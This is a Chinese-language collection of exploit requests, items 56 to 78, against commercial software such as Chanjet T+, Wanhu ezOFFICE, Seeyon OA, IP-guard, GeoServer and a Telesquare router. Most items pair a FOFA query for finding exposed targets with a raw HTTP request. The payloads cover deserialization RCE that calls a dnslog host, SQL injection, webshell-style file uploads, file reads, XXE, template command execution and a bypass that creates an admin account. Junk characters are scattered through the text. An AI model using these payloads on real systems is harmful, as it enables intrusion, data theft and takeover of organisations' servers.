/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
/ P+ ~7 M2 c  P  ?8 {6 U$ X8 G1 t/ J* s" \/ d/ ~
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
) @# e" Z# K5 ^! z; o* _& BFOFA: app="畅捷通-TPlus"- q" l; G9 x* R  f- F
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
' Y4 s( u6 ^4 }6 _% ~; oHost: x.x.x.x
! Z( Q; e5 E9 E% Q, w+ ]8 r* i' L) @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36+ ^" z6 j/ t6 a% W
Content-Type: application/json* j, s$ A5 h* ~
0 l. y3 p  ]1 D9 [6 @5 c
{' ]5 n- b2 m6 Y' h
  "storeID":{
; A8 C# F$ A# z2 D! A    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",) @$ Y; P: G. I' V5 M3 ]! H
   "MethodName":"Start",) P& R! d6 O3 ~: O
    "ObjectInstance":{/ `( f! o2 @0 m
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. e' P1 r( i6 u1 v4 W7 [        "StartInfo": {
9 ~5 E# G% D. ]& G; e/ ~4 j0 v           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",: w) `3 y4 W: G( y9 X: p
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
8 M5 M& ~' c2 T* O! M       }
; r4 [' Z' o) x/ |& f* d7 [0 e    }( z' D& x7 R. A1 H0 S. J  ]& f
  }
- `: u* J, z" v1 [0 N}( f! ~" ~3 f- `  f6 s' e
* ?; G( ?' m# m; X7 i( n  b# s
: ]# H  A4 y0 J* e
57. 畅捷通T+ keyEdit.aspx SQL注入
/ U- ^: L( I- Q2 k7 dFOFA:app="畅捷通-TPlus"
$ K# O0 O6 V! OGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.12 c( y9 E" F7 I, H
Host: host
9 ^4 d  F+ i, ]9 B' p% NUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 i7 S: O+ U* r3 u' Z. K' LAccept-Charset: utf-8
* ^% h) d0 A! @* e  `3 k7 b0 L- T7 gAccept-Encoding: gzip, deflate/ l  f4 {/ F9 b& }
Connection: close/ t. L3 b+ C5 o% {1 G

1 H9 U+ _* H8 {, y+ I* ]1 q: X
" \% K# Z# e3 g: M58. 畅捷通T+ KeyInfoList.aspx sql注入
/ R4 Y! G, B% \- F: `3 yFOFA:app="畅捷通-TPlus"
9 S1 X5 l; t9 |* Q/ z4 ?: LGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.19 M, S6 X9 P& [( E3 E# l8 b/ e
Host: your-ip7 E- s0 ?: X, n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ Q! P& _/ \# e2 v7 P% h" @
Accept-Charset: utf-8
" Z: {% y$ q8 f9 e( jAccept-Encoding: gzip, deflate* R3 y# h, t- U0 B' X
Connection: close+ u2 U: a6 r  \' R7 |( i$ p* |

$ w8 K9 j. t3 ]& ]; d2 F( H$ |. `$ X! a0 @( {# B
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行/ Q- `% v5 L  ^) d
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
* V  h: {1 z- [) ~POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
+ ^$ y) F" [  Y4 z& u6 EHost: 192.168.86.128:9090
$ i% d/ ^- B9 W" fUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.368 m" l2 B. e/ f0 Q0 [& T6 C* @
Connection: close
6 X3 E' f' j4 K- A8 q. {8 uContent-Length: 1669; ]5 k% k) b7 y6 R7 s& k
Accept: */*3 K& G# G7 |* V! Y* p% x2 p. M( |
Accept-Language: en& L3 ^+ V4 Q2 l+ b+ Q- G
Content-Type: application/x-www-form-urlencoded5 j, S% u# O: x. s- H4 R+ F6 F, C6 U
Accept-Encoding: gzip- @  {$ T3 ~# H* p' N$ H
5 q; S6 ]) |; c2 Y6 e( f" z$ U
PAYLOAD6 I  {: z. S- U  A

+ P- _: ~! B0 ~# W& V& f3 H3 y) l5 P1 w6 {$ W& f
60. 百卓Smart管理平台 importexport.php SQL注入7 |, D/ B* q( ]: E
FOFA:title="Smart管理平台"( @6 ~5 f, s  F+ f$ K) i' p
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
% q; I5 E) |( B- ~( t6 k/ ]Host:
8 m, |- g: m, E/ q% W# tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; D# i0 J$ p, F* E0 U$ |+ x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 t2 M2 [/ \8 |' S; q  o7 }Accept-Encoding: gzip, deflate; \( m6 T4 H2 Z
Accept-Language: zh-CN,zh;q=0.9
' P1 A, Z/ Z+ @5 p: {) V$ lConnection: close5 u& u# J- v9 r0 T4 N! I

; d8 j4 G  K4 T" O% w! W: T$ [
- E3 y" [, u1 B/ n- D# U/ B61. 浙大恩特客户资源管理系统 fileupload 任意文件上传6 C; X/ z" X+ {- s) A6 e
FOFA: title="欢迎使用浙大恩特客户资源管理系统"% W* K1 b4 m% s4 Q; Q' {
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
4 H+ h9 B1 c1 d' r, M0 CHost: x.x.x.x
6 M+ J" p! t8 {$ p- S# o- |+ qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 d% o4 J1 m7 |2 x6 }Connection: close
' f8 U1 G  |# a6 ]! O3 p* A( ^Content-Length: 273 h- u" y; g/ ~; O; y* D: k
Accept: */*# }6 p- M  o; Z0 d$ w
Accept-Encoding: gzip, deflate8 {0 V8 h. a* l: O% |
Accept-Language: en
7 @% g4 K: P4 d+ K; y; mContent-Type: application/x-www-form-urlencoded# C5 [2 B! \5 q) y% j7 z
7 z! M3 j7 g0 [5 c
8uxssX66eqrqtKObcVa0kid98xa1 s" M" b9 \9 s: [$ a

& c* D9 L4 M3 S. Q) a$ I: x1 \% S
62. IP-guard WebServer 远程命令执行
0 q8 C/ M, ^5 d. ?) f' u' ZFOFA:"IP-guard" && icon_hash="2030860561"( ~0 z9 k" r  Q5 W) I4 @; C1 ^6 M4 L7 j, `
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
0 S- \7 o  F4 l7 EHost: x.x.x.x* f% v- N9 I& e) V
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.360 H3 F% [& X. p3 S1 t6 S9 v  I
Connection: close. R; o( [# h( [& b8 @9 h) u, y
Accept: */*, p! j: f" h( {8 l: a1 l& b5 g( T( _
Accept-Language: en
- b+ U7 s0 r8 m5 E9 DAccept-Encoding: gzip
, q: B3 Q$ b9 r, T6 J5 R! D3 l8 [/ O, r9 t
+ p; d3 `; S' F' V7 R* a. _
访问% q" @; r+ D- c: H5 V; B# u
- s6 x, y0 z# B% `& ], c
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
; I  V$ ?( H; i! fHost: x.x.x.x
) C" u9 V2 C; }$ d+ N; G
% x% K7 X7 N. t# j7 s7 V. ]7 E- @
5 B0 t' j4 J. E0 }4 `2 s1 L63. IP-guard WebServer任意文件读取5 z+ v2 k( x# C6 r
IP-guard < 4.82.0609.0
/ @& J' F1 c+ SFOFA:icon_hash="2030860561"1 ~/ A2 e* g0 |" U0 B7 F
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1/ K8 Q- J5 q! W9 Q" h
Host: your-ip/ @* E; A& G; x1 h5 S- }3 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
3 }. x& M: A" D( dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 y. F& X! K% W' dAccept-Encoding: gzip, deflate
# [1 g4 \. ]1 @7 W% BAccept-Language: zh-CN,zh;q=0.91 Q% a& x% n' R
Connection: close
1 c! q  j2 {/ y! s7 q' h8 oContent-Type: application/x-www-form-urlencoded
( X+ H" K. B* o# c1 Z, s5 ?$ f8 j+ T. o* Y( e7 b
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A. X, D8 B3 g6 W1 Y+ ?9 u9 _

: ^- _& b5 R: p+ I7 W4 R64. 捷诚管理信息系统CWSFinanceCommon SQL注入
8 p% P9 i4 _4 W; s! z% lFOFA:body="/Scripts/EnjoyMsg.js"0 B# r4 T1 Q* X% R( n
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1% l. q3 X7 @- b+ V+ M6 g
Host: 192.168.86.128:90012 A" x; I) y6 ?6 c6 w, n
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
- W4 X# p  i# q- n9 \3 w/ PConnection: close# E  P% E/ Q4 {2 ^' {
Content-Length: 369
% u- j$ F% W% l% {- {8 N7 o- w( ]Accept: */*
0 b1 E( i9 l$ b; F) oAccept-Language: en
( v0 L# m, E$ l* n' l; nContent-Type: text/xml; charset=utf-8
6 {  E) E+ \  pAccept-Encoding: gzip
, h+ R) q6 U' j9 V
+ X. L+ {. x: [<?xml version="1.0" encoding="utf-8"?>
/ x1 j) N  t& X7 k# g<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
' o; ^& T" z8 [0 [<soap:Body>
: W+ B0 `. G  m& N5 O* L% \) j9 G    <GetOSpById xmlns="http://tempuri.org/">
4 A, h6 x/ y- v. x2 s9 b" H) {      <sId>1';waitfor delay '0:0:5'--+</sId>
7 c: v/ M' ?, z# s    </GetOSpById>5 C/ \( K' ]1 U
  </soap:Body>2 ^2 Q) O" t( Y
</soap:Envelope>( y% V1 \0 w. X5 n

. {7 v3 t7 M4 q% @3 ^: I! f" a6 g0 i/ f3 U% ?
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
" s& C0 H2 x3 c8 ~: S" h4 V) g. hFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"6 j& y: X. g, M, c" ]
响应200即成功创建账号test123456/123456% a& o9 I% u* V# G
POST /SystemMng.ashx HTTP/1.1
" x: S) y7 z( }/ _8 }8 E2 DHost:" T: Q' F/ j4 p; M2 H% R, n
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
2 \, M4 W  w: ]Accept-Encoding: gzip, deflate' ^/ c2 }( P6 Y0 g2 V5 ~% J
Accept: */*7 O9 I0 ~9 L0 k
Connection: close
; R4 M' h  ~( ]- P: w# F  XAccept-Language: en; ^+ W* x$ X4 z) `: E+ _* T
Content-Length: 1747 v; ?* }- j9 k# ], L( J, O. a

" e# t  ~) R8 n9 I: o! _0 joperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
0 x5 l: c$ x7 j3 w6 u0 d# X! p9 j0 K
( R. N- q' q  S/ T% I1 J1 t
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
2 D/ t+ ]4 D2 h8 Y; M1 U) uFOFA:app="万户ezOFFICE协同管理平台") z% }. j! s; Z8 @; o; D9 Q) Q; `
7 V1 A8 p' d9 R
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1( K: n/ a4 u! o% r
Host: x.x.x.x" E4 B% h2 z6 w) Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
# M7 E- U2 y. W  |4 ZConnection: close
6 a  h8 Y/ T2 Y- J" zAccept: */*
* L- O$ I. B( c$ l. IAccept-Language: en0 Y  \, X: R( t! w
Accept-Encoding: gzip
' L- I2 c# k. |; k2 k9 {. p. H6 v: r* P: F

$ `. q; Z8 }3 j第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
, W4 ?- ]- i6 f! D
+ S2 R" e& T" c1 B6 i67. 万户ezOFFICE wpsservlet任意文件上传
+ S; w1 b7 g) XFOFA:app="万户网络-ezOFFICE"7 u3 A+ p: `& K8 Y4 P, h% L) j1 ]3 z
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型; U# H- J2 g; {- a" e7 z, T) @
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
6 V1 W+ R+ @0 E& R4 ?Host: x.x.x.x
5 z3 ?" [! O9 Y+ r$ _  ?4 n( jUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
$ T& o* h0 [4 W& \6 b' a8 B8 iContent-Length: 173- h6 e7 z* Y5 M4 }  V5 \. ~' f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
$ T% v: t1 g  V1 a, v6 [Accept-Encoding: gzip, deflate
8 j7 F) p' u7 [4 S6 `5 RAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
) g; p* R1 c' c3 d! qConnection: close  J$ R, n7 L+ r! Z/ I+ {
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
& M, |, v! \/ `0 K8 ?4 B7 t  EDNT: 16 d* k2 r( X2 I/ C" M
Upgrade-Insecure-Requests: 1
  x9 G% {  s- f  v5 H
) O( s! E3 x" [6 p; x8 }) D( A--ufuadpxathqvxfqnuyuqaozvseiueerp# q" k; Y0 F: b  R0 `
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
2 S& l# a$ O% G, h9 a9 F# ~, H" ?2 h6 k/ C4 n7 l6 @
<% out.print("sasdfghjkj");%>
* D. r, _, [4 [, z% b0 K$ F--ufuadpxathqvxfqnuyuqaozvseiueerp--
8 M0 @1 _* g5 E; F
& D, @& o7 |0 _! m' b
$ P& {" u' Q- y9 A" M3 e文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
0 z- Z3 G, y6 V6 M0 t; U; i' o' J: G7 V: O
68. 万户ezOFFICE wf_printnum.jsp SQL注入
$ b9 r2 C6 M3 H6 a2 K& J, R1 IFOFA:app="万户ezOFFICE协同管理平台"3 @; |* Z3 B7 l, `) V4 P
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
: ~/ n' n9 K! aHost: {{host}}
9 j) s9 V! d. vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36, s" t' u  T: C8 P; `4 P( ?" f3 I, C
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8; E. p  b3 h. u4 ?0 d
Accept-Encoding: gzip, deflate
& }9 ]" M) ^/ D8 W9 I  EAccept-Language: zh-CN,zh;q=0.9
& M+ f$ x  z  F, aConnection: close
' }: l+ |& v5 l* m1 l/ J3 |. B
: N) }4 \, P! S. @+ B  [& J! f
8 j  w! m- a2 q( E69. 万户 ezOFFICE contract_gd.jsp SQL注入  D- c+ Y8 w# q3 O
FOFA:app="万户ezOFFICE协同管理平台"
6 r5 H$ r3 x& W9 T, O& A* z# P6 gGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
) n0 ]+ N' C6 L+ mHost: your-ip1 s8 Z; d1 \6 W; |4 h
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36+ G4 C# J% d$ |8 v2 j1 J
Accept-Encoding: gzip, deflate
/ h" D& k0 h7 m" e! Y7 c+ ]8 {Accept: */*
+ a# n6 c$ @. NConnection: keep-alive/ e. r3 N7 X2 S' O
0 D) K5 `7 Y* |9 n# l
6 `# v- X  r: ~) E
70. 万户ezEIP success 命令执行' m0 R$ h7 n' r7 X9 y
FOFA:app="万户网络-ezEIP"
& s, X" V" D) ~$ `7 ~; V4 iPOST /member/success.aspx HTTP/1.1
# x5 \5 D8 ^3 x, H3 JHost: {{Hostname}}+ G1 g+ E* d: D. q$ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" w0 f7 D9 [( {: x
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=) i- }6 \7 Y9 x5 I4 x
Content-Type: application/x-www-form-urlencoded
% l( G" `* X# W0 GTYPE: C
; t" O8 ?( i9 Y$ TContent-Length: 16702, H! b! q9 T2 [2 r* y% e

# ]# @  c& \4 k& F: g, V__VIEWSTATE=PAYLOAD& z! u8 R; t; Z, H$ C1 a# R
) V4 `5 v4 M: p4 _. R' c

0 g" H" m6 L7 A% V+ ~2 a71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
8 [( s+ p( T* C6 vFOFA:body="PM2项目管理系统BS版增强工具.zip"" X+ P- |% n1 M1 ]+ `4 N0 X* F
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1- P6 `) [, v" s- ^! J/ b
Host: x.x.x.xx.x.x.x
( x. l5 J* A7 pUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" d# ^" S0 _0 j* F: Y& C5 e
Connection: close4 v8 g& Y/ B5 j6 D1 D  ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ t+ l& P7 L2 o6 u7 P+ UAccept-Encoding: gzip, deflate
9 b2 V5 H0 ~; _" Z6 u+ GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" z1 i4 S2 x# f4 m2 P' H) IUpgrade-Insecure-Requests: 1, z2 d) n! e" n, C1 R6 ^) Q

7 @& W) Y* D" e. j) \6 Q: S1 S% y
- ^6 p( R, Z( J# P72. 致远OA getAjaxDataServlet XXE
5 ]6 D6 B) o$ M' ^* n& V* i  GFOFA:app="致远互联-OA"- U! e9 Z- T, B! T
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
. P& n" t% D; b, i7 e* {Host: 192.168.40.131:8099
; x: n% P" h4 b9 XUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
; m0 e' j3 @& e: i$ G# D" n+ P" MConnection: close- u5 }% [% x8 V1 U8 g8 w
Content-Length: 583
# G% ^7 r6 Y6 t5 H" fContent-Type: application/x-www-form-urlencoded0 a2 T$ r/ I1 \- g. S0 t
Accept-Encoding: gzip
/ T/ i: u# v9 L6 U- F) f2 Q& @) Z) `3 M1 @, D4 J
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
) z6 o8 n) C$ ~% K6 ?8 _% Z7 z( p# `# F& y9 b

% ], a5 a9 d: i+ u& [73. GeoServer wms远程代码执行
5 S3 D/ D/ x* Y. |* ?0 F, kFOFA:icon_hash=”97540678”
! o! e8 G, b* ^* C+ ]3 APOST /geoserver/wms HTTP/1.1- W, S; t* S2 T9 C- ~  {3 J
Host:% d, e# A- h6 ]# ~3 B5 X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
! X! w+ S  b' l  B) M. x8 A& TContent-Length: 19814 i: a9 U; \5 T  \
Accept-Encoding: gzip, deflate
  z' s8 p: Y8 ?9 [2 v" y+ |Connection: close/ ?& v5 t7 N/ t4 Z1 l, r5 @9 |
Content-Type: application/xml
( G4 z* ~5 |9 L6 F( k3 l0 w2 m* MSL-CE-SUID: 3
9 Y, ~$ P# S' Z5 L/ E) v+ l9 t& j4 a. P; G* `4 k  M' W
PAYLOAD  `6 A; q( H# W/ [% n
: Q4 d+ `% I' }* C0 X7 O
* R) }% }6 ]& J& O' M& V0 T
74. 致远M3-server 6_1sp1 反序列化RCE3 l& u+ }* e7 p+ D  z8 F5 n( v6 U. |6 v
FOFA:title="M3-Server"
1 E+ T% L+ q- M2 X. iPAYLOAD
4 H8 r; i% B' a" l9 `( V+ O. P& N( A; n. z
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE5 y+ |) x2 }; ~, {; i3 j
FOFA:app="TELESQUARE-TLR-2005KSH"& ^( [" U6 @7 K3 I
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
0 z+ L% c' [7 x5 Q. ?Host: x.x.x.x
5 Y6 r! M% C9 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# m) @+ M2 N' b0 A3 S
Connection: close
  |  }: Y+ T; ~8 sAccept: */*; g# k4 @0 l2 \# \2 K% x
Accept-Language: en5 P7 d5 r5 M; r7 f/ h
Accept-Encoding: gzip
. V" N( K+ f* Y$ f- u# G
/ {/ j. r. A* ~  b' C3 Y/ |7 U5 D6 A4 ]3 t0 p& ?$ r
GET /cgi-bin/test28256.txt HTTP/1.1
/ ]& I' \2 l, G! S9 \( MHost: x.x.x.x
; ^# p) [& S! I: I1 C% u% h$ ~4 u5 F5 \7 c; Y

3 h$ Q1 A% P4 g76. 新开普掌上校园服务管理平台service.action远程命令执行. P5 v9 ]6 ~+ j1 X. i5 V5 g# s
FOFA:title="掌上校园服务管理平台"& p" l& n1 K. N9 ]% b
POST /service_transport/service.action HTTP/1.1
8 g9 q  g8 {- }; F: {Host: x.x.x.x" ]6 e. \, X. t7 Z8 [) R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.03 V' F  @. S, {% m, ]
Connection: close' @8 U- W/ y1 q" J; N
Content-Length: 2119 X( d" [0 [& D, I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 ]; V: p# @, r5 D. F# aAccept-Encoding: gzip, deflate
! Z$ r+ {, ^3 L$ b) r) [0 m- lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" E) V# D' p: j3 q* D% \) w6 R! |Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A42 I5 `4 |: ?0 k3 X
Upgrade-Insecure-Requests: 10 c8 ^% H: k) V8 H
* S7 v0 ?* \6 _
{
" O2 y3 p4 o7 L" w"command": "GetFZinfo",
4 j3 p6 g+ a+ ?; a( E4 w2 v6 a4 M% t  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"4 l1 L6 Y/ k' K# k+ Z- ^
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"! W$ q, H* |, g2 H5 ~" E3 }2 E
}
( K9 d4 o7 Z9 t" z& a! q7 u7 @

# h( L! n5 y* c: P( @7 PGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
* Q  u; R. X) @4 s; R0 {2 Z/ `6 H; bHost: x.x.x.x3 `* d! h+ g3 g4 S; R% x9 g

& w. B. \1 x6 j) v" W- P7 I; Z( W
4 n1 d# x1 n: c& t
" U" ?+ o; z: X77. F22服装管理软件系统UploadHandler.ashx任意文件上传* [4 ]- U2 X8 Q  y. Z4 ]7 U& q5 x, E
FOFA:body="F22WEB登陆"
: Y6 f& R9 k6 r8 W# K9 |POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
# V5 _/ W! n/ ~" J3 s* @% vHost: x.x.x.x
$ G5 o- W" h+ D- T% O! `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 o+ g# I5 H2 k5 ^8 {! x. h4 yConnection: close/ Y( Z2 L( h) `; p
Content-Length: 433/ K5 s5 o; _2 Q& C4 V4 \
Accept: */*9 f0 [! t+ ?9 q2 n' B
Accept-Encoding: gzip, deflate
1 r  i- R9 g( r3 E% z5 Q/ q8 p2 WAccept-Language: zh-CN,zh;q=0.9
: u7 M7 M$ c( t) I" I  kContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
' T* {' q- M& y0 ?' [
) U( i9 @* t) R1 a) q  U- V------------398jnjVTTlDVXHlE7yYnfwBoix5 ?5 T% o+ e6 |" z: o' C9 p
Content-Disposition: form-data; name="folder"# v! Q+ m5 X  O" |. Q" g2 s9 U  O
" {. G5 m( @& ?  H3 \0 t
/upload/udplog! ]" |9 e; n$ U5 I! m4 S! H7 c
------------398jnjVTTlDVXHlE7yYnfwBoix( N0 h% p1 J1 k6 y1 o( x
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"" s9 n4 Q3 Y5 b0 ~
Content-Type: application/octet-stream
4 \- s/ a: l3 S, {( P
( f4 Y+ u2 E8 S" `$ shello1234567
  M+ D6 P0 B' }$ x1 N  q4 s, L) e------------398jnjVTTlDVXHlE7yYnfwBoix- |8 l' r' [1 x: b9 v2 ^8 A
Content-Disposition: form-data; name="Upload"8 F$ ?9 @0 k# N$ [$ {: U
! v- i$ M1 S3 ^  |
Submit Query
( Z* z# e- H1 A- k. r------------398jnjVTTlDVXHlE7yYnfwBoix--
$ l4 e8 I; S3 K
; @- ]6 g& Y8 ~5 C. ^+ @- e" t: M8 O1 E  q7 d/ ~4 I+ q
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
" o/ A, q# E* PFOFA:icon_hash="2001627082"
( |+ k9 ^" V( S1 s! z3 [0 p# ]! zPOST /Platform/System/FileUpload.ashx HTTP/1.1
2 Z4 [0 j% `0 d6 gHost: x.x.x.x
: b5 T; V- `' cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 Z: N. ~5 P- d0 aConnection: close
- ^* |; Z& |7 V7 _Content-Length: 336- m, Q' J0 w: E2 q( k4 m
